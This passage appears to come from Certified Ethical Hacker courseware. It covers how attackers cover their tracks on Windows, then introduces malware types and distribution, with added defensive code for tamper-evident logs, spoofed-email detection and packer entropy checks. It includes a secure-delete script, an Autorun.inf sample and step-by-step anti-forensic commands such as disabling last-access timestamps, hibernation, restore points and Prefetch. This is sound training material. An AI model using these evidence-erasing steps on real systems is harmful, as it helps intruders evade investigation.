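    Returns the number of bytes overwritten per pass."""
    size = os.path.getsize(path)
    with open(path, "r+b", buffering=0) as f:
        for fill in passes:
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(block, remaining)
                f.write(secrets.token_bytes(n) if fill is None else fill * n)
                remaining -= n
            f.flush()
            os.fsync(f.fileno())
    return size


def secure_delete(path: str, passes=DEFAULT_PASSES) -> int:
    """Overwrite, rename a few times to random names so the original name is
    gone from the directory entry as well, then unlink."""
    size = overwrite_file(path, passes)
    directory = os.path.dirname(path) or "."
    for _ in range(3):
        new_path = os.path.join(directory, secrets.token_hex(8))
        os.rename(path, new_path)
        path = new_path
    os.unlink(path)
    return size


def _make_sample_file() -> str:
    fd, path = tempfile.mkstemp()
    os.write(fd, b"sensitive command history\n" * 50)   # 1300 bytes
    os.close(fd)
    return path


def overwritten_contents(fill: bytes) -> bytes:
    """Run a single pass with a fixed pattern and return what is read back,
    so the overwrite can be verified before the file is removed."""
    path = _make_sample_file()
    overwrite_file(path, passes=(fill,))
    with open(path, "rb") as f:
        data = f.read()
    os.unlink(path)
    return data


def demo() -> tuple:
    """Create a sample file, securely delete it, and report (bytes, exists)."""
    path = _make_sample_file()
    wiped = secure_delete(path)
    return wiped, os.path.exists(path)

if __name__ == "__main__":
    print(demo())
```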
Disable Windows Functionality
Disable the Last Access Timestamp
The last access timestamp of a file records the date and time when the file was last opened for reading or writing. Therefore, every time a user accesses a file, the timestamp is updated. Attackers use the fsutil tool to disable or enable the last access timestamp. fsutil is a command-line utility in the Windows OS used to set the NTFS volume behavior parameter DisableLastAccess, which controls the enabling or disabling of the last access timestamp. For example, DisableLastAccess = 1 indicates that last access timestamps are disabled, and DisableLastAccess = 0 indicates that they are enabled. (On Windows 10 version 1803 and later, the values 2 and 3 additionally mark the setting as system-managed, enabled and disabled respectively.) As shown in the screenshot, attackers use the following command to disable last access updates:
fsutil behavior set disablelastaccess 1
An investigator can read the current setting with fsutil behavior query disablelastaccess; a value changed from the default on a system where nobody admits to changing it is itself a lead.

Figure 6.160: Screenshot of the fsutil command
Disable Windows Hibernation
The hibernation file (hiberfil.sys) is a hidden system file located in the root directory of the volume where the OS is installed. It contains a copy of the system RAM written to disk at the moment the user chose to hibernate the system. This information is valuable, because security personnel can use it to investigate an attack on the system (a memory image can hold passwords, decrypted data, and the list of running processes). Therefore, disabling Windows hibernation is a crucial step toward covering tracks.
The attacker can disable Windows hibernation through the registry by implementing the following steps:
- Open the Registry Editor and navigate to the following location:
  Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\P
- Double-click HibernateEnabled in the right pane; an Edit DWORD (32-bit) Value dialog box appears.
- In the Value data: field, enter a value of 0 to disable hibernation.
- Press OK.

Figure 6.16: Screenshot of Registry Editor to disable hibernation

Attackers can also disable Windows hibernation through the command prompt by implementing the following steps:
- Launch the command prompt with administrator privileges.
- Use the following command to disable hibernation:
  powercfg.exe /hibernate off
Disable Windows Virtual Memory (Paging File)
Virtual memory in Windows is backed by a special file, the paging file (pagefile.sys), which is used as overflow space when RAM (physical memory) runs short. For example, if an attacker has an encrypted file and wants to read it, he or she must first decrypt it; pages of the decrypted data can remain in the paging file even after the attacker logs out of the system. Moreover, some third-party programs keep plaintext passwords and other sensitive information in memory temporarily, and those pages can be swapped out to the same file. Therefore, disabling paging in Windows is a crucial step toward covering tracks.
The attacker can disable paging by implementing the following steps:
1. Open the Control Panel and navigate to the following location: System and Security > System > Advanced system settings
2. A System Properties dialog box appears; in the Advanced tab, click Settings... under the Performance section.
3. A Performance Options dialog box appears; go to the Advanced tab and click Change... under the Virtual memory section.
4. A Virtual Memory dialog box appears; uncheck Automatically manage paging file size for all drives.
5. Select the drive where paging should be disabled, then check the option No paging file and click Set.
6. In the System Properties window, click Yes.
7. Finally, click OK to implement the changes.

Figure 6.162: Screenshot of disabling paging through Control Panel
Disable System Restore Points
System restore points contain information about hidden data and previously deleted files. This poses a risk for attackers, as the deleted files can be recovered from previous restore points.
The attacker can disable system restore points by implementing the following steps:
- Open the Control Panel and navigate to the following location: System and Security > System > System protection
- A System Properties dialog box appears; in the System Protection tab, select the drive and click Configure...
- Under the Restore Settings section, select the Disable system protection option and click the Delete button.
- The System Protection wizard appears; click Continue to delete all restore points on the drive.
- Click OK.
- Repeat the above steps for all disk partitions.

Figure 6.163: Screenshot of disabling restore points through Control Panel (Windows 10)
Disable Windows Thumbnail Cache
thumbs.db is a Windows file that stores thumbnails of graphics files such as GIF, JPEG, PNG, and TIFF and of document types such as PPTX and DOCX. This thumbnail file contains information regarding files that were previously used on or deleted from the system. For example, if an attacker used an image file to hide a malicious file and later deleted it, a thumbnail of that image remains stored inside the thumbs.db file, which reveals that the deleted file was previously present on the system.
The attacker can disable the thumbnail cache by implementing the following steps:
- Press the Windows + R keys to open the Run dialog box.
- Type gpedit.msc and press Enter or click OK.
- The Local Group Policy Editor window appears; navigate to User Configuration > Administrative Templates > Windows Components > File Explorer.
- Double-click the Turn off the caching of thumbnails in hidden thumbs.db files setting in the right pane.
- Select Enabled to turn off the thumbnail cache.
- Click OK.
Note that this policy covers only the per-folder thumbs.db files. Current Windows versions also keep a central cache in the thumbcache_*.db files under %LocalAppData%\Microsoft\Windows\Explorer, which investigators examine in the same way.

Figure 6.164: Screenshot of disabling the thumbnail cache in Local Group Policy Editor
Disable Windows Prefetch Feature
Prefetch is a Windows feature that stores specific data about the applications typically used on the system. The stored data helps enhance system performance by reducing the time required to load or start applications.
For example, if an attacker installed a malicious application and then uninstalled it, a Prefetch file (.pf) for that application remains in C:\Windows\Prefetch. Security personnel can use these Prefetch files during the investigation of a security incident to establish which programs were executed, when they last ran, and how often, even after the programs themselves have been deleted.
Attackers can disable the Prefetch feature by implementing the following steps:
- Press the Windows + R keys to open the Run dialog box.
- Type services.msc and press Enter or click OK.
- Search for the Superfetch service (named SysMain on recent Windows 10 builds) and double-click it to open Superfetch Properties (Local Computer).
- From the drop-down options in Startup type, select the Disabled option.
- Click OK.
Stopping the service prevents new entries from being written; the existing .pf files remain on disk until they are deleted separately.

Figure: Screenshot of disabling the Superfetch service
Track-Covering Tools
Track-covering tools help the attacker to clean up all the tracks of computer and Internet activities on the target computer. Track-covering tools free cache space, delete cookies, clear Internet history and shared temporary files, delete logs, and discard junk.
CCleaner
Source: https://www.ccleaner.com
CCleaner is a system optimization, privacy, and cleaning tool. It allows attackers to remove unused files and clean traces of Internet browsing details from the target PC. With this tool, an attacker can very easily erase his or her tracks.

Figure 6.16: Screenshot of CCleaner

Some examples of track-covering tools are listed as follows:
- DBAN (https://dban.org)
- Eraser (https://www.cybertronsoft.com)
- Privacy Wipe (https://privacyroot.com)
- BleachBit (https://www.bleachbit.org)
- ClearProg (http://www.clearprog.de)
Defending against Covering Tracks
The various countermeasures against covering tracks are listed as follows:
- Activate logging functionality on all critical systems.
- Conduct a periodic audit on IT systems to ensure that the logging functionality is in accordance with the security policy.
- Ensure that new events do not overwrite old entries in the log files when the storage limit is exceeded.
- Configure the appropriate and minimal permissions necessary to read and write the log files stored on critical systems.
- Maintain a separate logging server on the DMZ so that all the critical servers, such as the DNS server, mail server, web server, etc., forward and store their logs on that server; an intruder who gains root on one of those servers can then delete only the local copy.
- Regularly update and patch OSs, applications, and firmware.
- Close all unused open ports and services.
- Protect the integrity of the log files stored on the system, for example by signing or hash-chaining the records, so that any alteration is detectable, and encrypt them as well where they hold sensitive data. Encryption alone hides the content but does not by itself reveal that a record was changed or removed.
- Set log files to "append only" mode (chattr +a on Linux) to prevent unauthorized deletion of log entries.
- Periodically back up the log files to unalterable media.
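One way to make stored log records tamper-evident, as an added example that is not part of the courseware: every record carries an HMAC over its own content and the previous record's tag, so deleting, editing, or reordering an entry breaks verification from that point on. The key, the host name, and the log events are constructed; the design point is that the key lives on the central log server, not on the hosts being logged, so an intruder with root on a host cannot recompute tags for the records they changed.

```python
"""Tamper-evident log records: HMAC-chained entries."""
import hashlib
import hmac
import json

LOG_KEY = b"placeholder-key-kept-on-the-log-server"   # constructed for the example
GENESIS = "0" * 64


def _tag(prev: str, event: dict) -> str:
    """HMAC over the previous tag and the canonical JSON of this event."""
    body = prev + json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hmac.new(LOG_KEY, body.encode(), hashlib.sha256).hexdigest()


def append_record(chain: list, event: dict) -> list:
    prev = chain[-1]["tag"] if chain else GENESIS
    chain.append({"prev": prev, "event": event, "tag": _tag(prev, event)})
    return chain


def verify_chain(chain: list):
    """Return (ok, index), where index is the first record that fails."""
    prev = GENESIS
    for i, rec in enumerate(chain):
        expected = _tag(prev, rec["event"])
        if rec["prev"] != prev or not hmac.compare_digest(rec["tag"], expected):
            return False, i
        prev = rec["tag"]
    return True, None


def build_sample_chain() -> list:
    """Constructed events resembling what a host forwards after a break-in."""
    events = [
        {"ts": "2024-03-01T09:00:01", "host": "web1",
         "msg": "sshd: Accepted password for admin from 198.51.100.7"},
        {"ts": "2024-03-01T09:00:05", "host": "web1",
         "msg": "sudo: admin : COMMAND=/bin/bash"},
        {"ts": "2024-03-01T09:00:09", "host": "web1",
         "msg": "useradd: new user: name=backup"},
        {"ts": "2024-03-01T09:00:12", "host": "web1",
         "msg": "sshd: session closed for user admin"},
    ]
    chain = []
    for event in events:
        append_record(chain, event)
    return chain


def delete_record(chain: list, index: int) -> list:
    """What an intruder who can edit the stored log would do; returns a copy."""
    return chain[:index] + chain[index + 1:]


def alter_record(chain: list, index: int, new_msg: str) -> list:
    """Rewrite one event's message; returns a copy."""
    altered = [dict(r) for r in chain]
    event = dict(altered[index]["event"], msg=new_msg)
    altered[index] = dict(altered[index], event=event)
    return altered

if __name__ == "__main__":
    chain = build_sample_chain()
    print(verify_chain(chain))
    print(verify_chain(delete_record(chain, 2)))
```

The chain has one blind spot worth knowing: removing the most recent records leaves a chain that still verifies, because nothing after them references their tags. Periodically recording the latest tag somewhere the host cannot write (the unalterable backup media in the list above, or the log server's own store) closes that gap.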
Module Summary
In this module, we discussed in detail the CEH hacking methodology along with the various phases involved in system hacking, such as gaining access, escalating privileges, maintaining access, and covering tracks. We also discussed the different techniques and tools attackers employ to gain access to a target system. This module also discussed various tools and techniques attackers use to escalate their privileges. It explained various techniques, such as the execution of malicious applications (keyloggers, spyware, rootkits, etc.), NTFS stream manipulation, and steganography, which attackers use to maintain remote access to a target system and steal critical information, as well as steganalysis for detecting hidden data. It also elaborated on the various techniques used by attackers to erase all evidence of compromise from a target system. Furthermore, the various countermeasures that should be employed to prevent system hacking attempts, along with various software protection tools, were discussed.
In the next module, we will discuss in detail the various malware threats.
Certified Ethical Hacker
Module 07: Malware Threats
Module Objectives
The primary objectives of this module are to provide knowledge about various types of malware and to illustrate how to perform malware analysis. This module presents different types of Trojans, backdoors, viruses, and worms; explains how they work and propagate or spread on the Internet; describes their symptoms; and discusses their consequences along with various malware analysis techniques such as static and dynamic malware analysis. It also discusses different ways to protect networks or system resources from malware infection.
At the end of this module, you will be able to:
- Describe the concepts of malware and malware propagation techniques
- Describe the concepts of advanced persistent threats (APTs) and their lifecycle
- Describe the concepts of Trojans, their types, and how they infect systems
- Explain the concepts of viruses, their types, and how they infect files
- Explain the concept of computer worms
- Explain the concepts of fileless malware and how it infects systems
- Perform malware analysis
- Explain different techniques to detect malware
- Adopt countermeasures against malware
Module Flow
- Malware Concepts
- Trojan Concepts
- Virus and Worm Concepts
- Malware Analysis
- Countermeasures
- Anti-Malware Software

Malware Concepts
To understand the various types of malware and their impact on network and system resources, we will begin with a discussion of the basic concepts of malware. This section describes malware and highlights the common techniques used by attackers to distribute malware on the web.
Introduction to Malware
Malware is malicious software that damages or disables computer systems and gives limited or full control of the systems to the malware creator for malicious activities such as theft or fraud. Malware includes viruses, worms, Trojans, rootkits, backdoors, botnets, ransomware, spyware, adware, scareware, crapware, rogueware, crypters, keyloggers, etc. These may delete files, slow down computers, steal personal information, send spam, or commit fraud. Malware can perform various malicious activities ranging from simple email advertising to complex identity theft and password stealing.
Malware programmers develop and use malware to:
- Attack browsers and track websites visited
- Slow down systems and degrade system performance
- Cause hardware failure, rendering computers inoperable
- Steal personal information, including contacts
- Erase valuable information, resulting in substantial data loss
- Attack additional computer systems directly from a compromised system
- Spam inboxes with advertising emails
Different Ways for Malware to Enter a System
Instant Messenger Applications
Infection can occur via instant messenger applications such as Facebook Messenger, WhatsApp Messenger, LinkedIn Messenger, Google Hangouts, or ICQ. Users are at high risk while receiving files via instant messengers. Regardless of who sends the file or where it is sent from, there is always a risk of infection by a Trojan. The user can never be 100% sure of who is at the other end of the connection at any particular moment. For example, if you receive a file through an instant messenger application from a known person such as Bob, you will try to open and view the file. This could be a trick whereby an attacker who has hacked Bob's messenger ID and password wants to spread Trojans across Bob's contact list to trap more victims.
Portable Hardware Media/Removable Devices
- Portable hardware media such as flash drives, CDs/DVDs, and external hard drives can also inject malware into a system. A simple way of injecting malware into the target system is through physical access. For example, if Bob can access Alice's system in her absence, then he can install a Trojan by copying the Trojan software from his flash drive onto her hard drive.
- Another means of portable media malware infection is through the Autorun function. Autorun, also referred to as Autoplay or Autostart, is a Windows feature that, if enabled, runs an executable program when a user inserts a CD/DVD in the DVD-ROM tray or connects a USB device. Attackers can exploit this feature to run malware along with genuine programs. They place an Autorun.inf file with the malware on a CD/DVD or USB device and trick people into inserting or plugging it into their systems. Because many people are not aware of the risks involved, their machines are vulnerable to Autorun malware. The following is the content of an Autorun.inf file:
  [autorun]
  open=setup.exe
  icon=setup.exe
  Note that Windows 7 and later honor the open= entry only for optical media; on a USB drive the file can still set the icon and label that lure a user into double-clicking the executable.
  To mitigate such infection, turn off the Autostart functionality. Follow the instructions below to turn off Autoplay in Windows 10:
  1. Click Start. Type gpedit.msc in the Start Search box, and then press ENTER.
  2. If you are prompted for an administrator password or confirmation, type the password, or click Allow.
  3. Under Computer Configuration, expand Administrative Templates, expand Windows Components, and then click Autoplay Policies.
  4. In the Details pane, double-click Turn off Autoplay.
  5. Click Enabled, and then select All drives in the Turn off Autoplay box to disable Autorun on all drives.
  6. Restart the computer.
Browser and Email Software Bugs
Outdated web browsers often contain vulnerabilities that can pose a major risk to the user's computer. A visit to a malicious site from such a browser can automatically infect the machine without downloading or executing any program. The same scenario occurs while checking e-mail with Outlook Express or some other software with well-known problems. Again, it may infect the user's system without even downloading an attachment. To reduce such risks, always use the latest version of the browser and e-mail software.
Insecure Patch Management
Unpatched software poses a high risk. Users and IT administrators do not update their application software as often as they should, and many attackers take advantage of this well-known fact. Attackers can exploit insecure patch management by injecting the software with malware that can damage the data stored on the company's systems. This process can lead to extensive security breaches, such as the stealing of confidential files and company credentials. Some applications that were found to be vulnerable and were patched recently include Microsoft Office (CVE-2019-1084), Microsoft Exchange Server (CVE-2019-1136), .NET Framework (CVE-2019-1083), Microsoft Graphics Component (CVE-2019-1118), a Docker flaw in Azure (CVE-2018-15664), Microsoft SQL Server RCE (CVE-2019-1068), and RDP RCE (CVE-2019-0887). Patch management must be effective in mitigating threats, and it is vital to apply patches and regularly update software programs.
Rogue/Decoy Applications
Attackers can easily lure a victim into downloading free applications/programs. If a free program claims to be loaded with features such as an address book, access to several POP3 accounts, and other functions, many users will be tempted to try it. POP3 (Post Office Protocol version 3) is an email retrieval protocol.
- If a victim downloads free programs and labels them as TRUSTED, protection software such as antivirus software will fail to flag the new software. In this situation, an attacker receives emails, POP3 account passwords, cached passwords, and keystrokes through email without being noticed.
- Attackers thrive on creativity. Consider an example in which an attacker creates a fake website (say, Audiogalaxy) for downloading MP3s. He or she could generate such a site using 15 GB of space for the MP3s and install any other systems needed to create the illusion of a website. This can fool users into thinking that they are merely downloading from other network users. However, the software could act as a backdoor and infect thousands of naive users.
- Some websites even link to anti-Trojan software, thereby fooling users into trusting them and downloading infected freeware. Included in the setup is a readme.txt file that can deceive almost any user. Therefore, any freeware site requires proper attention before any software is downloaded from it.
- Webmasters of well-known security portals, who have access to vast archives containing various hacking programs, should act responsibly with regard to the files they provide and scan them often with antivirus and anti-Trojan software to guarantee that their site is free of Trojans and viruses. Suppose that an attacker submits a program infected with a Trojan (e.g., a UDP flooder) to an archive's webmaster. If the webmaster is not alert, the attacker may use this opportunity to infect the files on the site with the Trojan. Users who deal with any software or web application should scan their systems daily. If they detect any new file, it is essential to examine it. If any suspicion arises regarding the file, it is also important to forward it to software detection labs for further analysis.
- It is easy to infect machines using freeware; thus, extra precautions are necessary.
Untrusted Sites and Free Web Applications/Software
- A website could be suspicious if it is located at a free website provider or one offering programs for illegal activities.
- It is highly risky to download programs or tools located on "underground" sites, e.g., Neurotickat software, because they can serve as a conduit for a Trojan attack on target computers. Users must assess the high risk of visiting such sites before browsing them.
- Many malicious websites have a professional look, massive archives, feedback forums, and links to other popular sites. Users should scan files using antivirus software before downloading them. Just because a website looks professional does not mean that it is safe.
- Always download popular software from its original site (or an officially dedicated mirror), and not from third-party sites with links to the (supposedly) same software.
Downloading Files from the Internet
Trojans enter a system when users download Internet-driven applications such as music players, files, movies, games, greeting cards, and screensavers from malicious websites, thinking that they are legitimate. Microsoft Word and Excel macros are also used effectively to transfer malware, and downloaded malicious MS Word/Excel files can infect systems. Malware can also be embedded in audio/video files as well as in video subtitle files.
Email Attachments
An attachment to an e-mail is the most common medium to transmit malware. The attachment can be in any form, and the attacker uses innovative ideas to trick the victim into clicking and downloading the attachment. The attachment may be a document, audio file, video file, brochure, invoice, lottery offer letter, job offer letter, loan approval letter, admission form, contract approval, etc.
Example 1: A user's friend is conducting some research, and the user would like to know more about the friend's research topic. The user sends an e-mail to the friend to inquire about the topic and waits for a reply. An attacker targeting the user also knows the friend's e-mail address. The attacker will merely code a program to falsely populate the e-mail "From:" field and attach a Trojan to the email. The user will check the email, think that the friend has answered the query in an attachment, download the attachment, and run it without thinking it might be a Trojan, resulting in an infection.
Some email clients, such as Outlook Express, have bugs that automatically execute attached files. To avoid such attacks, use secure email services, investigate the headers of emails with attachments, confirm the sender's email address, and download the attachment only if the sender is legitimate.
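The header investigation recommended above, applied to Example 1, as an added example that is not part of the courseware. Both messages are constructed: in the first, the From: field claims the friend's university address, but Return-Path and the originating Received: hop point elsewhere and the attachment is an executable with a double extension; the second is what a genuine reply with a PDF looks like. The relay host names and the list of risky extensions are assumptions for the example.

```python
"""Sender-origin and attachment checks for an inbound message."""
import email
import re
from email import policy
from email.utils import parseaddr

RISKY_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".bat", ".cmd", ".ps1",
                    ".hta", ".lnk", ".iso", ".docm", ".xlsm"}

# Constructed: spoofed From:, foreign Return-Path, attacker-controlled first hop.
SPOOFED_MESSAGE = """\
Return-Path: <bounce-9f1@mail-blast.example>
Received: from mx.corp.example (mx.corp.example [192.0.2.10]) by inbox.corp.example with ESMTP
Received: from smtp.attacker.example (smtp.attacker.example [198.51.100.7]) by mx.corp.example with ESMTP
From: Bob <bob@university.example>
To: user@corp.example
Subject: Re: your question about my research
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Here is the write-up you asked for.
--b1
Content-Type: application/octet-stream; name="research.pdf.exe"
Content-Disposition: attachment; filename="research.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAA=
--b1--
"""

# Constructed: the genuine reply, relayed by the university's own mail server.
LEGIT_MESSAGE = """\
Return-Path: <bob@university.example>
Received: from mx.corp.example (mx.corp.example [192.0.2.10]) by inbox.corp.example with ESMTP
Received: from mail.university.example (mail.university.example [192.0.2.80]) by mx.corp.example with ESMTP
From: Bob <bob@university.example>
To: user@corp.example
Subject: Re: your question about my research
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain; charset="us-ascii"

Write-up attached.
--b2
Content-Type: application/pdf; name="research.pdf"
Content-Disposition: attachment; filename="research.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b2--
"""


def _domain(address: str) -> str:
    return parseaddr(address)[1].rsplit("@", 1)[-1].lower()


def originating_host(msg) -> str:
    """The bottom-most Received: header was added first, so it names the hop
    closest to the sender; the ones above it were added by our own relays."""
    received = msg.get_all("Received") or []
    if not received:
        return ""
    match = re.match(r"\s*from\s+(\S+)", str(received[-1]))
    return match.group(1).lower() if match else ""


def analyze_message(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    from_domain = _domain(str(msg["From"]))
    return_path_domain = _domain(str(msg.get("Return-Path", "")))
    origin = originating_host(msg)
    risky = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        pieces = name.split(".")
        ext = "." + pieces[-1] if len(pieces) > 1 else ""
        if ext in RISKY_EXTENSIONS:
            risky.append(name)
    spoof_suspected = (return_path_domain != from_domain
                       or not origin.endswith(from_domain))
    return {"from_domain": from_domain, "return_path_domain": return_path_domain,
            "originating_host": origin, "spoof_suspected": spoof_suspected,
            "risky_attachments": risky}

if __name__ == "__main__":
    print(analyze_message(SPOOFED_MESSAGE))
    print(analyze_message(LEGIT_MESSAGE))
```

The Received: chain is only trustworthy down to the first hop operated by someone else; everything below that can be forged by the sender, which is why the comparison stops at the hop that our own relay recorded. Mail flows that legitimately pass through third-party services need an allow list for those relays, or SPF/DKIM/DMARC results in place of this manual check.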
Network Propagation
Network security is the first line of defense for protecting information systems from hacking incidents. However, various factors such as the replacement of network firewalls and mistakes by operators may sometimes allow unfiltered Internet traffic into private networks. Malware operators continuously attempt connections to addresses within the Internet address range owned by targets to seek an opportunity for unfettered access. Some malware propagates through technological networks. For example, the Blaster worm starts from a local machine's IP address or a completely random address and attempts to infect sequential IP addresses. Although network propagation attacks that take advantage of vulnerabilities in common network protocols (e.g., SQL Slammer) have not been prevalent recently, the potential for such attacks still exists.
File Sharing
If NetBIOS (port 139), FTP (port 21), SMB (port 445), etc., on a system are open for file sharing or remote execution, they can be used by others to access the system. This can allow attackers to install malware and modify system files.
Attackers can also use a DoS attack to shut down the system and force a reboot so that the Trojan can restart itself immediately. To prevent such attacks, ensure that the file sharing property is disabled. To disable the file sharing option, click Start and type Control Panel. Then, in the results, click on the Control Panel option and navigate to Network and Internet > Network and Sharing Center > Change Advanced Sharing Settings. Select a network profile and, under the File and Printer Sharing section, select Turn off file and printer sharing. This will prevent file sharing abuse.
Installation by other Malware
A piece of malware that can be commanded and controlled will often be able to re-connect to the malware operator's site using common browsing protocols. This functionality allows malware on the internal network to receive both software and commands from the outside. In such cases, the malware installed on one system drives the installation of other malware on the network, thereby causing damage to the network.
Bluetooth and Wireless Networks
Attackers use open Bluetooth and Wi-Fi networks to attract users to connect to them. These open networks have software and hardware devices installed at the router level to capture the network traffic and data packets as well as to find the account details of the users, including usernames and passwords.
Common Techniques Attackers Use to Distribute Malware on the Web
Source: Security Threat Report (http://www.sophos.com)
Some standard techniques used to distribute malware on the web are as follows:
▪ Black Hat Search Engine Optimization (SEO): Black hat SEO (also referred to as unethical SEO) uses aggressive SEO tactics such as keyword stuffing, inserting doorway pages, page swapping, and adding unrelated keywords to get higher search engine rankings for malware pages.
▪ Social Engineered Click-jacking: Attackers inject malware into websites that appear legitimate to trick users into clicking them. When clicked, the malware embedded in the link executes without the knowledge or consent of the user.
▪ Spear-phishing Sites: This technique is used for mimicking legitimate institutions, such as banks, to steal passwords, credit card and bank account data, and other sensitive information.
▪ Malvertising: This technique involves embedding malware-laden advertisements in legitimate online advertising channels to spread malware on the systems of unsuspecting users.
▪ Compromised Legitimate Websites: Often, attackers use compromised websites to infect systems with malware. When an unsuspecting user visits the compromised website, he/she unknowingly installs the malware on his/her system, after which the malware performs malicious activities.

▪ Drive-by Downloads: This refers to the unintentional downloading of software via the Internet. Here, an attacker exploits flaws in browser software to install malware by merely visiting a website.
▪ Spam Emails: The attacker attaches a malicious file to an email and sends the email to multiple target addresses. The victim is tricked into clicking the attachment and thus executes the malware, thereby compromising his/her machine. This technique is the most common method currently in use by attackers. In addition to email attachments, an attacker may also use the email body to embed the malware.

Components of Malware
Malware authors and attackers create malware using components that can help them achieve their goals. They can use malware to steal information, delete data, change system settings, provide access, or merely multiply and occupy space. Malware is capable of propagating and functioning secretly. Some essential components of most malware programs are as follows:
▪ Crypter: It is a software program that can conceal the existence of malware. Attackers use this software to elude antivirus detection. It protects malware from reverse engineering or analysis, thus making it difficult to detect by security mechanisms.
▪ Downloader: It is a type of Trojan that downloads other malware (or) malicious code and files from the Internet to a PC or device. Usually, attackers install a downloader when they first gain access to a system.
▪ Dropper: It is a covert carrier of malware. Attackers embed notorious malware files inside droppers, which can perform the installation task covertly. The dropper is the component attackers first get onto the system; when executed, it writes the embedded malware to disk and launches it. The dropper can transport malware code and execute malware on a target system without being detected by antivirus scanners.
▪ Exploit: It is the part of the malware that contains code or a sequence of commands that can take advantage of a bug or vulnerability in a digital system or device. Attackers use such code to breach the system's security through software vulnerabilities to spy on information or to install malware. Based on the type of vulnerabilities abused, exploits are categorized into local exploits and remote exploits.

▪ Injector: This program injects exploits or malicious code available in the malware into other vulnerable running processes and changes the method of execution to hide or prevent its removal.
▪ Obfuscator: It is a program that conceals the malicious code of malware via various techniques, thus making it difficult for security mechanisms to detect or remove it.
▪ Packer: This software compresses the malware file to convert the code and data of the malware into an unreadable format. It uses compression techniques to pack the malware.
▪ Payload: It is the part of the malware that performs the desired activity when activated. It may be used for deleting or modifying files, degrading the system performance, opening ports, changing settings, etc., to compromise system security.
▪ Malicious Code: This is a piece of code that defines the basic functionality of the malware and comprises commands that result in security breaches. It can take the following forms:
o Java Applets
o ActiveX Controls
o Browser Plug-ins
o Pushed Content
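The packer and crypter components described above are the reason static signature matching fails against freshly packed samples. The following Python script is an added example written for this page, not code from EC-Council or from any malware family: it wraps a harmless constructed text blob in a toy packer (zlib compression followed by a repeating-key XOR, a hypothetical format chosen only for illustration), shows that a byte signature present in the plain payload no longer appears in the packed form but reappears after unpacking, and applies the Shannon-entropy heuristic that analysts use to flag compressed or encrypted sections that a signature scanner cannot read.

```python
import math
import zlib
from collections import Counter

# Constructed stand-in for a "payload": harmless text, not malware code.
PAYLOAD = b"".join(
    b"record %05d: benign demo payload line\n" % i for i in range(1000)
)
# The byte pattern a static signature scanner would look for.
SIGNATURE = b"benign demo payload"

# Hypothetical fixed key for the toy packer (assumption made for this example).
DEMO_KEY = b"\x5a\xa5\x3c\xc3\x0f\xf0\x69\x96\x12\x21\x7e\xe7\x4b\xb4\x8d\xd8"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR every byte with a repeating key; applying it twice restores the data."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(data: bytes, key: bytes = DEMO_KEY) -> bytes:
    """Toy packer: compress, then XOR-encode (the 'crypter' layer)."""
    return xor_with_key(zlib.compress(data, 9), key)


def unpack(blob: bytes, key: bytes = DEMO_KEY) -> bytes:
    """The stub a real packer prepends does this in memory before jumping to the code."""
    return zlib.decompress(xor_with_key(blob, key))


def signature_match(data: bytes, signature: bytes = SIGNATURE) -> bool:
    """Static signature scan: does the byte pattern occur verbatim?"""
    return signature in data


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant stream, up to 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Analyst heuristic: compressed or encrypted sections sit close to 8 bits/byte."""
    return shannon_entropy(data) >= threshold


def demo(key: bytes = DEMO_KEY) -> dict:
    """Run the packer and both detection approaches against the constructed payload."""
    packed = pack(PAYLOAD, key)
    restored = unpack(packed, key)
    return {
        "signature_in_plain": signature_match(PAYLOAD),
        "signature_in_packed": signature_match(packed),
        "signature_after_unpack": signature_match(restored),
        "restored_ok": restored == PAYLOAD,
        "entropy_plain": round(shannon_entropy(PAYLOAD), 2),
        "entropy_packed": round(shannon_entropy(packed), 2),
        "packed_flagged": looks_packed(packed),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:24} {value}")
```

The signature scanner finds the pattern in the plain payload and in the unpacked result, but not in the packed blob, while the entropy check flags the packed blob and not the plain text. That is why sandboxes and unpacking engines exist: the signature is only matchable after the unpacking stub has run, and entropy alone cannot say what was packed.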

Module Flow
▪ Malware Concepts
▪ APT Concepts
▪ Trojan Concepts
▪ Virus and Worm Concepts
▪ Fileless Malware Concepts
▪ Malware Analysis
▪ Countermeasures
▪ Anti-Malware Software
APT Concepts
Advanced persistent threats are a major security concern for any organization, as they represent threats to the organization's assets, resources, financial records, and other confidential data. APT attacks can damage the reputation of an organization by revealing sensitive data. This section discusses APTs as well as their characteristics and lifecycle.

What are Advanced Persistent Threats?
An advanced persistent threat is defined as a type of network attack whereby an attacker gains unauthorized access to a target network and remains in the network without being detected for a long time. The word "advanced" signifies the use of techniques to exploit the underlying vulnerabilities in the system. The word "persistent" signifies the external command-and-control (C&C) system that continuously extracts the data and monitors the victim's network. The word "threat" signifies human involvement in coordination. APT attacks are highly sophisticated attacks whereby an attacker uses well-crafted malicious code along with a combination of multiple zero-day exploits to gain access to the target network. These attacks involve well-planned and coordinated techniques whereby attackers erase evidence of their malicious activities after their objectives have been fulfilled. APT attacks are usually performed on organizations possessing valuable information, such as financial, healthcare, defense and aerospace, manufacturing, and business organizations. The main objective of these attacks is to obtain sensitive information rather than sabotaging the organization and its network.
Information obtained by an attacker through APT attacks includes:
▪ Classified documents
▪ User credentials
▪ Employee's or customer's personal information
▪ Network information
▪ Transaction information
▪ Credit card information
▪ Organization's business strategy information
▪ Control system access information

Characteristics of Advanced Persistent Threats
